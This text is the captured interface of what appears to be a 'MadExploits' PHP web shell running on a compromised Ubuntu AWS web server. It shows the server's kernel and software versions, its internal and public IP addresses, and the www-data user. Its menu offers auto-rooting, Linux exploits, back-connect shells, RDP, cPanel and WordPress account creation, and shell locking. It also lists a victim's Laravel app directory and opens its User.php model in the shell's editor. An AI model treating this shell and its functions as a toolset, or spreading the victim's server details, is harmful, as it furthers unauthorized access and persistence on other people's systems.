Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.188.92.213
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings-staging /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
Console
[ DIR ]
drwxrwxr-x
Exceptions
[ DIR ]
drwxrwxr-x
Http
[ DIR ]
drwxrwxr-x
Jobs
[ DIR ]
drwxrwxr-x
Mail
[ DIR ]
drwxrwxr-x
Notifications
[ DIR ]
drwxrwxr-x
Providers
[ DIR ]
drwxrwxr-x
Repository
[ DIR ]
drwxrwxr-x
Admin.php
101
B
-rw-rw-r--
AppConstants.php
118
B
-rw-rw-r--
Food.php
383
B
-rw-rw-r--
Foods.php
425
B
-rw-rw-r--
Place.php
602
B
-rw-rw-r--
PlaceCategory.php
176
B
-rw-rw-r--
Places.php
167
B
-rw-rw-r--
User.php
1.21
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App; use Illuminate\Notifications\Notifiable; use Illuminate\Contracts\Auth\MustVerifyEmail; use Jenssegers\Mongodb\Auth\User as Authenticatable; use Illuminate\Contracts\Auth\CanResetPassword; use Illuminate\Auth\Passwords\CanResetPassword as ResetPassword; use App\Notifications\ResetPasswordNotification; class User extends Authenticatable implements CanResetPassword { use Notifiable, ResetPassword; public $timestamps = false; protected $collection = 'users'; /** * The attributes that are mass assignable. * * @var array */ protected $fillable = [ 'name', 'email', 'telephone', 'location', 'password', 'api_token', 'provider', 'provider_id', 'avatar', 'verification_token', 'nickname', 'created_at', 'role', 'verification_start' ]; /** * The attributes that should be hidden for arrays. * * @var array */ protected $hidden = [ 'password', 'remember_token', ]; /** * Send the password reset notification. * * @param string $token * @return void */ public function sendPasswordResetNotification($token) { $this->notify(new ResetPasswordNotification($token)); } }
Close